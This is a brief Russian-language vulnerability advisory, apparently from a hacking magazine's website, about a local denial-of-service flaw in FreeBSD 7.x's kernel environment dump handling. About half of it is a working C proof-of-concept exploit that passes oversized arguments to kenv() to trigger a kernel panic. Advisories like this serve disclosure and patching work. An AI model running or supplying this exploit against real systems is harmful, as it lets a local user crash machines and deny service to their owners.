Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: FreeBSD 7.x
Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в
функциональности работы с дампами ядра. Атакующий может передать специально
сформированные данные, что приведет к отказу системы в обслуживании.
Эксплоит:
/* FreeBSD 7.x local kernel panic as mentioned in Errata Notice 09:01
http://security.freebsd.org/advisories/FreeBSD-EN-09:01.kenv.asc,
kokanin@gmail */
#include <kenv.h>
#include <stdio.h>
void main(){
kenv(KENV_DUMP,NULL,123123123,123123123);
}